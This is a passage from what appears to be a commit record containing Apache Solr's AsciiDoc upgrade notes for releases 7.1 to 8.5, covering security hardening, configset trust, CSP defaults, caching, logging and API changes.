https:\/\/issues.apache.org\/jira\/browse\/SOLR-14095[SOLR-14095] for technical discussion of the change). This queue is used internally by the Overseer to reliably handle\noperations, to communicate operation results between the Overseer and the coordinator node, and by the REQUESTSTATUS API for displaying information about async Collection operations.\n\nThis change won\u2019t require you to change any client-side code you should see no differences on the client side.\nHowever, it does require some care when upgrading an existing SolrCloud cluster depending on your upgrade strategy.\n\nIf you are upgrading Solr with an atomic restart strategy:\n\n* If you don\u2019t use async or REQUESTSTATUS operations, you should be able to restart and not see any issues.\n* If you do use Collection API operations:\n. Pause Collection API operations.\n. Cleanup queues (See the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Upgrade and restart the nodes.\n. Resume all normal operations.\n\nIf you are upgrading Solr with a rolling restart strategy:\n\n* If you don\u2019t use Collection API operations, you should be able to do a rolling restart and not see\nany issues.\n* If you do use Collection API operations, but you can pause their use during the restart the easiest\nway is to:\n. Pause Collection API operations.\n. Upgrade and restart all nodes.\n. Cleanup queues (See the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Resume all normal operations.\n\nIf you use Collection API operations and can\u2019t pause them during the upgrade:\n\n. Start 8.5 nodes with the system property: `-Dsolr.useUnsafeOverseerResponse=deserialization`. Ensure the\nOverseer node is upgraded last.\n. Once all nodes are in 8.5 and once you don\u2019t need to read old status anymore, restart again removing the\nsystem property.\n\nIf you prefer to keep the old (but insecure) serialization strategy, you can start your nodes using the system\nproperty: `-Dsolr.useUnsafeOverseerResponse=true`. Keep in mind that this will be removed in future version of Solr.\n\n*Security Manager*\n\nSolr now has the ability to run with a Java security manager enabled. To enable this, set the property `SOLR_SECURITY_MANAGER_ENABLED=true` in `solr.in.sh` or `solr.in.cmd`. Note that if you are using HDFS to store indexes, you cannot enable the security manager.\n\nIn Solr 9.0, this will be the default.\n\nSee also the section <<securing-solr.adoc#enable-security-manager,Enable Security Manager>>.\n\n*Block\/Allow Specific IPs*\n\nSolr has two new parameters to allow you to restrict access to Solr using IP addresses. Use `SOLR_IP_WHITELIST` to configure a whitelist, and `SOLR_IP_BLACKLIST` to configure a blacklist. These properties are defined in `solr.in.sh` or `solr.in.cmd`.\n\nSee also the section <<securing-solr.adoc#enable-ip-access-control,Enable IP Access Control>>.\n\n*BlockJoin Facet Deprecation*\n\nThe BlockJoinFacetComponent is marked for deprecation and will be removed in 9.0.\nUsers are encouraged to migrate to `uniqueBlock()` in JSON Facet API.\nMore information about this is available in the section <<json-faceting-domain-changes.adoc#block-join-domain-changes,Block Join Domain Changes>>.\n\n*Caching with the Boolean Query Parser*\n\nBy default, the <<other-parsers.adoc#boolean-query-parser,Boolean Query Parser>> caches queries in Solr's filterCache. It's now possible to disable this with the local param `cache=false`.\n\n*Indexing Log Files*\n\nSolr now includes a command line tool, `bin\/postlogs` which will index Solr's log files into a collection.\nThis provides an easy way to use Solr or visualization tools (such as Zeppelin) to troubleshoot problems with the system.\n\nThis tool is not yet officially documented in the Reference Guide, but draft documentation is available in a branch and can be accessed https:\/\/github.com\/apache\/lucene-solr\/blob\/visual-guide\/solr\/solr-ref-guide\/src\/logs.adoc[via GitHub].\n\n*Highlighting*\n\nSolr's Unified Highlighter now has two parameters to help control passage sizing, `hl.fragAlignRatio` and `hl.fragsizeIsMinimum`. See the section <<highlighting.adoc#the-unified-highlighter,The Unified Highlighter>> for details about these new parameters.\n\n*Shared Library System Parameter*\n\nSolr's `solr.xml` file has long had support for a `sharedLib` parameter, which allows you to define a common location for .jar files that may need to be in the path for all cores.\n\nThis property can now be defined in `solr.in.sh` or `solr.in.cmd` as a system property (`-Dsolr.sharedLib=\/path\/to\/lib`) added to `SOLR_OPTS` (see `solr.in.sh` or `solr.in.cmd` for details).\n\n=== Solr 8.4\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote84[8.4 Release Notes]\nfor an overview of the main new features of Solr 8.4.\n\nWhen upgrading to 8.4.x users should be aware of the following major changes from 8.3.\n\n*Package Management System*\n\nVersion 8.4 introduces a package management system to Solr. The goals of the\nsystem are to allow hot (live) deployment of plugins, provide packaging\nguidelines for plugins, and standardize Solr's approach by following familiar\nconcepts used in other package management systems.\n\nThe system is designed to eventually replace use of the `<lib ..\/>` directive,\nthe Blob Store, and other methods of deploying plugins and custom components\nto Solr.\n\nThe system is currently considered experimental, so use with caution. It must\nbe enabled with a system parameter passed at start up before it can be used.\nFor details, please see the section <<package-manager.adoc#package-manager,Package Management>>.\n\nWith this feature Solr's <<adding-custom-plugins-in-solrcloud-mode.adoc#adding-custom-plugins-in-solrcloud-mode,Blob Store>>\nfunctionality is now deprecated and will likely be removed in 9.0.\n\n*Security*\n\nThe follow mix of changes were all made with the intention of making Solr more secure out of the box.\n\n* The `solrconfig.xml` file in Solr's `_default` configset has been trimmed of\n the following previously pre-configured items:\n+\n** All `<lib ...\/>` directives. This means that Solr Cell (aka Tika), Learning\nto Rank, Clustering (with Carrot2), language identification, and Velocity (for\nthe `\/browse` sample search interface) are no longer enabled out of the box.\n** The `\/browse`, `\/tvrh`, and `\/update\/extract` request handlers.\n** The Term Vector Component.\n** The XSLT and Velocity response writers.\n+\nAll of these items can be added to your Solr implementation by manually editing\n`solrconfig.xml` to add them back in, or use the <<config-api.adoc#config-api,Config API>>.\n+\nThe `sample_techproducts_configs` and the examples found in `.\/example` are unchanged.\n\n* Configsets that have been uploaded with an unsecured Configset API (i.e., when authentication is not enabled) are considered \"Untrusted Configsets\".\n+\nIn order to bolster Solr's out-of-the-box security, these untrusted configsets\nare no longer allowed to use the `<lib ...\/>` directive to implement contribs\nor custom Jars.\n+\nWhen upgrading to 8.4, if you are using untrusted configsets that contain `<lib ..\/>`\ndirectives, their corresponding collections will not load (they will cease to\nwork). You have a few options in this case:\n\n** You can secure your Solr instance with <<authentication-and-authorization-plugins.adoc#authentication-and-authorization-plugins,authentication>>\nand re-upload the configset (using the `bin\/solr zk upconfig ...`\n<<solr-control-script-reference.adoc#solr-control-script-reference,Solr CLI>> command);\n** You can put your custom Jars in Solr's classpath instead of `lib` directories;\n** You can try the new package management system to manage your custom Jars.\n+\nSee the section <<configsets-api.adoc#configsets-upload,Upload a Configset>>\n for more details about trusted vs. untrusted configsets.\n\n* Our default Jetty configuration has been updated to now set a\nContent-Security-Policy (CSP) by default. See `.\/server\/etc\/jetty.xml` for\ndetails about how it is configured.\n+\nAs a result of this change, any custom HTML served by Solr's HTTP server that contains inline Javascript will no longer execute in modern browsers. The options for you are:\n\n** Change your JavaScript code to not run inline any longer;\n** Edit `jetty.xml` to remove CSP (creating weaker security protection);\n** Remove\/alter the headers with a reverse proxy.\n\n* Solr's Blob Store and runtime libs functionality are now deprecated and are planned to be removed from Solr in version 9.0. It has been replaced with the new package management system.\n\n* The Velocity response writer is also now deprecated and is planned to be removed from Solr in version 9.0.\n\n*Using Collapse with Group Disallowed*\n\nUsing the <<collapse-and-expand-results.adoc#collapse-and-expand-results,CollapsingQueryParser>>\nwith <<result-grouping.adoc#result-grouping,Result Grouping>> has never been\nsupported as it causes inconsistent behavior and NullPointerException errors.\nWe have now explicitly disallowed this combination to prevent these errors.\nIf you are using these together, you will need to modify your queries.\n\n*SolrJ*\n\n* SolrJ now supports the `shards.preference` parameter for single-shard\nscenarios to ensure multi-shard and single-shard request routing works in the same way.\n+\nSee <<using-solrj.adoc#cloud-request-routing,Cloud Request Routing>> and\n<<distributed-requests.adoc#shards-preference-parameter,shards.preference Parameter>> for details.\n\n* `QueryResponse.getExplainMap()` type has changed from `Map<String, String>` to `Map<String, Object>` in order to support structured explanations.\n+\nThis change is expected to be mostly back-compatible. Compiled third-party\ncomponents will work the same due to type erasure, but source code changes may\nbe required.\n\n* Replica routing code has been moved to SolrJ, making those classes available\nto clients if necessary.\n\n*Streaming Expressions*\n\n* A new DBSCAN clustering streaming evaluator has been added.\n\n* The `precision` stream evaluator can now operate on matrices.\n\n* The `random` streaming expression can now create the x-axis.\n\n*JSON Facets*\n\n* Two new aggregations have been added: `missing` and `countvals`.\n\n* Several aggregations now support multi-valued fields: `min`, `max`, `avg`, `sum`, `sumsq`, `stddev`, `variance`, and `percentile`.\n\n*Caches*\n\n* After the addition of `CaffeineCache` in 8.3, legacy SolrCache\nimplementations are deprecated and likely to be removed in 9.0.\n+\nUsers are encouraged to transition their cache configurations to use\n`org.apache.solr.search.CaffeineCache` as soon as feasible.\n\n=== Solr 8.3\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote83[8.3 Release Notes] for an overview of the main new features of Solr 8.3.\n\nWhen upgrading to 8.3.x users should be aware of the following major changes from 8.2.\n\n*JWT Authentication*\n\nJWT Authentication now supports multiple identity providers.\nTo allow this, the parameter `jwkUrl` has been deprecated and replaced with `jwksUrl`.\nImplementations using `jwkUrl` will continue to work as normal, but users\n should plan to transition their configurations to use `jwksUrl` instead as\n soon as feasible.\n\n*Caches*\n\n* Solr has a new cache implementation, `CaffeineCache`, which is now recommended over other caches. This cache is expected to generally provide most users lower memory footprint, higher hit ratio, and better multi-threaded performance.\n+\nSince caching has a direct impact on the performance of your Solr\n implementation, before switching to any new cache implementation in\n production, take care to test for your environment and traffic patterns so\n you fully understand the ramifications of the change.\n\n* A new parameter, `maxIdleTime`, allows automatic eviction of cache items that have not been used in the defined amount of time. This allows the cache to release some memory and should aid those who want or need to fine-tune their caches.\n\nSee the section <<query-settings-in-solrconfig.adoc#query-settings-in-solrconfig,Query Settings in SolrConfig>> for more details about these and other cache options and parameters.\n\n=== Solr 8.2\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote82[8.2 Release Notes] for an overview of the main new features of Solr 8.2.\n\nWhen upgrading to 8.2.x, users should be aware of the following major changes from v8.1.\n\n*ZooKeeper 3.5.5*\n\nSolr 8.2 updates the version of ZooKeeper included with Solr to v3.5.5.\n\nIt is recommended that external ensembles set up to work with Solr also be updated to ZooKeeper 3.5.5.\n\nThis ZooKeeper release includes many new security features.\nIn order for Solr's Admin UI to work with 3.5.5, the `zoo.cfg` file must allow access to ZooKeeper's \"four-letter commands\".\nAt a minimum, `ruok`, `conf`, and `mntr` must be enabled, but other commands can optionally be enabled if you choose.\nSee the section <<setting-up-an-external-zookeeper-ensemble.adoc#configuration-for-a-zookeeper-ensemble,Configuration for a ZooKeeper Ensemble>> for details.\n\n[WARNING]\nUntil 8.3, https:\/\/issues.apache.org\/jira\/browse\/SOLR-13672[SOLR-13672] causes the ZK Status screen in the Admin UI to not be able to report status. This only impacts the UI, ZooKeeper still operates correctly.\n\n*Routed Aliases*\n\n* Routed aliases now use collection properties to identify collections that belong to the alias; prior to 8.2, these aliases used core properties.\n+\nThis is backward-compatible and aliases created with prior versions will\n continue to work. However, new collections will no longer add the\n `routedAliasName` property to the `core.properties` file so any external code\n depending on this location will need to be updated.\n\n\/\/ TODO: aliases.adoc still says this is per-core?\n\n* Time-routed aliases now include a `TRA` infix in the collection name, in the pattern `<alias>_TRA_<timestamp>`. +\nCollections created with older versions will continue to work.\n\n*Distributed Tracing Support*\n\nThis release adds support for tracing requests in Solr. Please review the section <<solr-tracing.adoc#solr-tracing,Distributed Solr Tracing>> for details on how to configure this feature.\n\n=== Solr 8.1\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote810[8.1 Release Notes] for an overview of the main new features of Solr 8.1.\n\nWhen upgrading to 8.1.x, users should be aware of the following major changes from v8.0.\n\n*Global maxBooleanClauses Parameter*\n\n* The behavior of the `maxBooleanClauses` parameter has changed to reduce the risk of exponential query expansion when dealing with pathological query strings.\n+\nA default upper limit of 1024 clauses is now enforced at the node level. This was the default prior to 7.0, and it can be overridden with a new global parameter in `solr.xml`. This limit will be enforced for all queries whether explicitly defined by the user (or client), or created by Solr and Lucene internals.\n+\nAn identical parameter is available in `solrconfig.xml` for limiting the size of queries explicitly defined by the user (or client), but this per-collection limit will still be restricted by the global limit set in `solr.xml`.\n+\nIf your use case demands that you a lot of OR or AND clauses in your queries, upon upgrade to 8.1 you may need to adjust the global `maxBooleanClauses` parameter since between 7.0 and 8.1 the limit was effectively unbounded.\n+\nFor more information about the new parameter, see the section <<format-of-solr-xml.adoc#global-maxbooleanclauses,Format of solr.xml: maxBooleanClauses>>.\n\n*Security*\n\n* JSON Web Tokens (JWT) are now supported for authentication. These allow Solr to assert a user is already authenticated via an external identity provider, such as an OpenID Connect-enabled IdP. For more information, see the section <<jwt-authentication-plugin.adoc#jwt-authentication-plugin,JWT Authentication Plugin>>.\n\n* A new security plugin for audit logging has been added. A default class `SolrLogAuditLoggerPlugin` is available and configurable in `security.json`. The base class is also extendable for adding custom audit plugins if needed. See the section <<audit-logging.adoc#audit-logging,Audit Logging>> for more information.\n\n*Collections API*\n\n* The output of the REQUESTSTATUS command in the Collections API will now include internal asynchronous requests (if any) in the \"success\" or \"failed\" keys.\n\n* The CREATE command will now return the appropriate status code (4xx, 5xx, etc.) when the command has failed. Previously, it always returned `0`, even in failure.\n\n* The MODIFYCOLLECTION command now accepts an attribute to set a collection as read-only. This can be used to block a collection from receiving any updates while still allowing queries to be served. See the section <<collection-management.adoc#modifycollection,MODIFYCOLLECTION>> for details on how to use it.\n\n* A new command RENAME allows renaming a collection by setting up a one-to-one alias using the new name. For more information, see the section <<collection-management.adoc#rename,RENAME>>.\n\n* A new command REINDEXCOLLECTION allows indexing existing stored fields from a source collection into a new collection. For more information, please see the section <<collection-management.adoc#reindexcollection,REINDEXCOLLECTION>>.\n\n*Logging*\n\n* The default Log4j2 logging mode has been changed from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n+\nIf even this slight risk is unacceptable, the Log4j configuration file found in `server\/resources\/log4j2.xml` has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n*Metrics*\n\n* The SolrGangliaReporter has been removed from Solr. The metrics library used by Solr, Dropwizard Metrics, was updated to version 4, and Ganglia support was removed from it due to a dependency on the LGPL license.\n\n*Browse UI (Velocity)*\n\n* Velocity and Velocity Tools were both upgraded as part of this release. Velocity upgraded from 1.7 to 2.0. Please see https:\/\/velocity.apache.org\/engine\/2.0\/upgrading.html about upgrading. Velocity Tools upgraded from 2.0 to 3.0. For more details, please see https:\/\/velocity.apache.org\/tools\/3.0\/upgrading.html for details about the upgrade.\n\n*Default Garbage Collector (GC)*\n\n* Solr's default GC has been changed from CMS to G1. If you prefer to use CMS or any other GC method, you can modify the `GC_TUNE` section of `solr.in.sh` (*nix) or `solr.in.cmd` (Windows).\n\n\n== Upgrading from 7.x Releases\n\nThe upgrade from 7.x to Solr 8.0 introduces several major changes that you should be aware of before upgrading.\nThese changes are described in the section <<major-changes-in-solr-8.adoc#major-changes-in-solr-8,Major Changes in Solr 8>>. It's strongly recommended that you do a thorough review of that section before starting your upgrade.\n\n[NOTE]\nIf you run in SolrCloud mode, you must be on Solr version 7.3 or higher in order to upgrade to 8.x.\n\n== Upgrading from Pre-7.x Versions\n\nUsers upgrading from versions of Solr prior to 7.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nThe upgrade from Solr 6.x to Solr 7.0 introduced several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b326e6244937b58dcb6a500f9b59f34bf6d3ce7","subject":"SOLR-13256: Add ref-guide upgrade notes for 7.7","message":"SOLR-13256: Add ref-guide upgrade notes for 7.7\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of implementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to your system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] file found in your Solr package. That file includes all the changes and updates that may effect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 8.x Releases\n\n=== Solr 8.1\n\n*Logging*\n\nSolr 8.1 changed the default log4j2 logging mode from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n\nIf even this slight risk is unacceptable, the log4j configuration file ..\/server\/resources\/log4j2.xml has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n== Upgrading to 7.x Releases\n\n=== Solr 7.7\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote77[7.7 Release Notes] for an overview of the main new features in Solr 7.7.\n\nWhen upgrading to Solr 7.7.x, users should be aware of the following major changes from v7.6:\n\n*Admin UI*\n\n* The Admin UI now presents a login screen for any users with authentication enabled on their cluster. Clusters with <<basic-authentication-plugin.adoc#basic-authentication-plugin,Basic Authentication>> will prompt users to enter a username and password. On clusters configured to use <<kerberos-authentication-plugin.adoc#kerberos-authentication-plugin,Kerberos Authentication>>, users will be directed to configure their browser to provide an appropriate Kerberos ticket.\n+\nThe login screen's purpose is cosmetic only - Admin UI-triggered Solr requests were subject to authentication prior to 7.7 and still are today. The login screen changes only the user experience of providing this authentication.\n\n*Distributed Requests*\n\n* The `shards` parameter, used to manually select the shards and replicas that receive distributed requests, now checks nodes against a whitelist of acceptable values for security reasons.\n+\nIn SolrCloud mode this whitelist is automatically configured to contain all live nodes. In standalone mode the whitelist is empty by default. Upgrading users who use the `shards` parameter in standalone mode can correct this value by setting the `shardsWhitelist` property in any `shardHandler` configurations in their `solrconfig.xml` file.\n+\nFor more information, see the <<distributed-requests.adoc#configuring-the-shardhandlerfactory,Distributed Request>> documentation.\n\n=== Solr 7.6\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote76[7.6 Release Notes] for an overview of the main new features in Solr 7.6.\n\nWhen upgrading to Solr 7.6, users should be aware of the following major changes from v7.5:\n\n*Collections*\n\n* The JSON parameter to set cluster-wide default cluster properties with the <<collections-api.adoc#clusterprop,CLUSTERPROP>> command has changed.\n+\nThe old syntax nested the defaults into a property named `clusterDefaults`. The new syntax uses only `defaults`. The command to use is still `set-obj-property`.\n+\nAn example of the new syntax is:\n+\n[source,json]\n----\n{\n \"set-obj-property\": {\n \"defaults\" : {\n \"collection\": {\n \"numShards\": 2,\n \"nrtReplicas\": 1,\n \"tlogReplicas\": 1,\n \"pullReplicas\": 1\n }\n }\n }\n}\n----\n+\nThe old syntax will be supported until at least Solr 9, but users are advised to begin using the new syntax as soon as possible.\n\n* The parameter `min_rf` has been deprecated and no longer needs to be provided in order to see the achieved replication factor. This information will now always be returned to the client with the response.\n\n*Autoscaling*\n\n* An autoscaling policy is now used as the default strategy for selecting nodes on which new replicas or replicas of new collections are created.\n+\nA default policy is now in place for all users, which will sort nodes by the number of cores and available freedisk, which means by default a node with the fewest number of cores already on it and the highest available freedisk will be selected for new core creation.\n\n* The change described above has two additional impacts on the `maxShardsPerNode` parameter:\n\n. It removes the restriction against using `maxShardsPerNode` when an autoscaling policy is in place. This parameter can now always be set when creating a collection.\n. It removes the default setting of `maxShardsPerNode=1` when an autoscaling policy is in place. It will be set correctly (if required) regardless of whether an autoscaling policy is in place or not.\n+\nThe default value of `maxShardsPerNode` is still `1`. It can be set to `-1` if the old behavior of unlimited `maxSharedsPerNode` is desired.\n\n*DirectoryFactory*\n\n* Lucene has introduced the `ByteBuffersDirectoryFactory` as a replacement for the `RAMDirectoryFactory`, which will be removed in Solr 9.\n+\nWhile most users are still encouraged to use the `NRTCachingDirectoryFactory`, which allows Lucene to select the best directory factory to use, if you have explicitly configured Solr to use the `RAMDirectoryFactory`, you are encouraged to switch to the new implementation as soon as possible before Solr 9 is released.\n+\nFor more information about the new directory factory, see the Jira issue https:\/\/issues.apache.org\/jira\/browse\/LUCENE-8438[LUCENE-8438].\n+\nFor more information about the directory factory configuration in Solr, see the section <<datadir-and-directoryfactory-in-solrconfig.adoc#datadir-and-directoryfactory-in-solrconfig,DataDir and DirectoryFactory in SolrConfig>>.\n\n=== Solr 7.5\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote75[7.5 Release Notes] for an overview of the main new features in Solr 7.5.\n\nWhen upgrading to Solr 7.5, users should be aware of the following major changes from v7.4:\n\n*Schema Changes*\n\n* Since Solr 7.0, Solr's schema field-guessing has created `_str` fields for all `_txt` fields, and returned those by default with queries. As of 7.5, `_str` fields will no longer be returned by default. They will still be available and can be requested with the `fl` parameter on queries. See also the section on <<schemaless-mode.adoc#enable-field-class-guessing,field guessing>> for more information about how schema field guessing works.\n* The Standard Filter, which has been non-operational since at least Solr v4, has been removed.\n\n*Index Merge Policy*\n\n* When using the <<indexconfig-in-solrconfig.adoc#mergepolicyfactory,`TieredMergePolicy`>>, the default merge policy for Solr, `optimize` and `expungeDeletes` now respect the `maxMergedSegmentMB` configuration parameter, which defaults to `5000` (5GB).\n+\nIf it is absolutely necessary to control the number of segments present after optimize, specify `maxSegments` as a positive integer. Setting `maxSegments` higher than `1` are honored on a \"best effort\" basis.\n+\nThe `TieredMergePolicy` will also reclaim resources from segments that exceed `maxMergedSegmentMB` more aggressively than earlier.\n\n*UIMA Removed*\n\n* The UIMA contrib has been removed from Solr and is no longer available.\n\n*Logging*\n\n* Solr's logging configuration file is now located in `server\/resources\/log4j2.xml` by default.\n\n* A bug for Windows users has been corrected. When using Solr's examples (`bin\/solr start -e`) log files will now be put in the correct location (`example\/` instead of `server`). See also <<installing-solr.adoc#solr-examples,Solr Examples>> and <<solr-control-script-reference.adoc#solr-control-script-reference,Solr Control Script Reference>> for more information.\n\n\n=== Solr 7.4\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote74[7.4 Release Notes] for an overview of the main new features in Solr 7.4.\n\nWhen upgrading to Solr 7.4, users should be aware of the following major changes from v7.3:\n\n*Logging*\n\n* Solr now uses Log4j v2.11. The Log4j configuration is now in `log4j2.xml` rather than `log4j.properties` files. This is a server side change only and clients using SolrJ won't need any changes. Clients can still use any logging implementation which is compatible with SLF4J. We now let Log4j handle rotation of Solr logs at startup, and `bin\/solr` start scripts will no longer attempt this nor move existing console or garbage collection logs into `logs\/archived` either. See <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more details about Solr logging.\n\n* Configuring `slowQueryThresholdMillis` now logs slow requests to a separate file named `solr_slow_requests.log`. Previously they would get logged in the `solr.log` file.\n\n*Legacy Scaling (non-SolrCloud)*\n\n* In the <<index-replication.adoc#index-replication,master-slave model>> of scaling Solr, a slave no longer commits an empty index when a completely new index is detected on master during replication. To return to the previous behavior pass `false` to `skipCommitOnMasterVersionZero` in the slave section of replication handler configuration, or pass it to the `fetchindex` command.\n\nIf you are upgrading from a version earlier than Solr 7.3, please see previous version notes below.\n\n=== Solr 7.3\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote73[7.3 Release Notes] for an overview of the main new features in Solr 7.3.\n\nWhen upgrading to Solr 7.3, users should be aware of the following major changes from v7.2:\n\n*ConfigSets*\n\n* Collections created without specifying a configset name have used a copy of the `_default` configset since Solr 7.0. Before 7.3, the copied configset was named the same as the collection name, but from 7.3 onwards it will be named with a new \".AUTOCREATED\" suffix. This is to prevent overwriting custom configset names.\n\n*Learning to Rank*\n\n* The `rq` parameter used with Learning to Rank `rerank` query parsing no longer considers the `defType` parameter. See <<learning-to-rank.adoc#running-a-rerank-query,Running a Rerank Query>> for more information about this parameter.\n\n*Autoscaling & AutoAddReplicas*\n\n* The behaviour of the autoscaling system will now pause all triggers from execution between the start of actions and the end of a cool down period. The triggers will resume after the cool down period expires. Previously, the cool down period was a fixed period started after actions for a trigger event completed and during this time all triggers continued to run but any events were rejected and tried later.\n\n* The throttling mechanism used to limit the rate of autoscaling events processed has been removed. This deprecates the `actionThrottlePeriodSeconds` setting in the <<solrcloud-autoscaling-api.adoc#change-autoscaling-properties,`set-properties` Autoscaling API>> which is now non-operational. Use the `triggerCooldownPeriodSeconds` parameter instead to pause event processing.\n\n* The default value of `autoReplicaFailoverWaitAfterExpiration`, used with the AutoAddReplicas feature, has increased to 120 seconds from the previous default of 30 seconds. This affects how soon Solr adds new replicas to replace the replicas on nodes which have either crashed or shutdown.\n\n*Logging*\n\n* The default Solr log file size and number of backups have been raised to 32MB and 10 respectively. See the section <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more information about how to configure logging.\n\n*SolrCloud*\n\n* The old Leader-In-Recovery implementation (implemented in Solr 4.9) is now deprecated and replaced. Solr will support rolling upgrades from old 7.x versions of Solr to future 7.x releases until the last release of the 7.x major version.\n+\nThis means to upgrade to Solr 8 in the future, you will need to be on Solr 7.3 or higher.\n\n* Replicas which are not up-to-date are no longer allowed to become leader. Use the <<collections-api.adoc#forceleader,FORCELEADER command>> of the Collections API to allow these replicas become leader.\n\n*Spatial*\n\n* If you are using the spatial JTS library with Solr, you must upgrade to 1.15.0. This new version of JTS is now dual-licensed to include a BSD style license. See the section on <<spatial-search.adoc#spatial-search,Spatial Search>> for more information.\n\n*Highlighting*\n\n* The top-level `<highlighting>` element in `solrconfig.xml` is now officially deprecated in favour of the equivalent `<searchComponent>` syntax. This element has been out of use in default Solr installations for several releases already.\n\nIf you are upgrading from a version earlier than Solr 7.2, please see previous version notes below.\n\n=== Solr 7.2\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote72[7.2 Release Notes] for an overview of the main new features in Solr 7.2.\n\nWhen upgrading to Solr 7.2, users should be aware of the following major changes from v7.1:\n\n*Local Parameters*\n\n* Starting a query string with <<local-parameters-in-queries.adoc#local-parameters-in-queries,local parameters>> `{!myparser ...}` is used to switch from one query parser to another, and is intended for use by Solr system developers, not end users doing searches. To reduce negative side-effects of unintended hack-ability, Solr now limits the cases when local parameters will be parsed to only contexts in which the default parser is \"<<other-parsers.adoc#lucene-query-parser,lucene>>\" or \"<<other-parsers.adoc#function-query-parser,func>>\".\n+\nSo, if `defType=edismax` then `q={!myparser ...}` won't work. In that example, put the desired query parser into the `defType` parameter.\n+\nAnother example is if `deftype=edismax` then `hl.q={!myparser ...}` won't work for the same reason. In this example, either put the desired query parser into the `hl.qparser` parameter or set `hl.qparser=lucene`. Most users won't run into these cases but some will need to change.\n+\nIf you must have full backwards compatibility, use `luceneMatchVersion=7.1.0` or an earlier version.\n\n*eDisMax Parser*\n\n* The eDisMax parser by default no longer allows subqueries that specify a Solr parser using either local parameters, or the older `\\_query_` magic field trick.\n+\nFor example, `{!prefix f=myfield v=enterp}` or `\\_query_:\"{!prefix f=myfield v=enterp}\"` are not supported by default any longer. If you want to allow power-users to do this, set `uf=* _query_` or some other value that includes `\\_query_`.\n+\nIf you need full backwards compatibility for the time being, use `luceneMatchVersion=7.1.0` or something earlier.\n\nIf you are upgrading from a version earlier than Solr 7.1, please see previous version notes below.\n\n=== Solr 7.1\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote71[7.1 Release Notes] for an overview of the main new features of Solr 7.1.\n\nWhen upgrading to Solr 7.1, users should be aware of the following major changes from v7.0:\n\n*AutoAddReplicas*\n\n* The feature to automatically add replicas if a replica goes down, previously available only when storing indexes in HDFS, has been ported to the autoscaling framework. Due to this, `autoAddReplicas` is now available to all users even if their indexes are on local disks.\n+\nExisting users of this feature should not have to change anything. However, they should note these changes:\n\n** Behavior: Changing the `autoAddReplicas` property from disabled (`false`) to enabled (`true`) using <<collections-api.adoc#modifycollection,MODIFYCOLLECTION API>> no longer replaces down replicas for the collection immediately. Instead, replicas are only added if a node containing them went down while `autoAddReplicas` was enabled. The parameters `autoReplicaFailoverBadNodeExpiration` and `autoReplicaFailoverWorkLoopDelay` are no longer used.\n** Deprecations: Enabling\/disabling autoAddReplicas cluster-wide with the API will be deprecated; use suspend\/resume trigger APIs with `name=\".auto_add_replicas\"` instead.\n+\nMore information about the changes to this feature can be found in the section <<solrcloud-autoscaling-auto-add-replicas.adoc#solrcloud-autoscaling-auto-add-replicas,SolrCloud Automatically Adding Replicas>>.\n\n*Metrics Reporters*\n\n* Shard and cluster metric reporter configuration now require a `class` attribute.\n** If a reporter configures the `group=\"shard\"` attribute then please also configure the 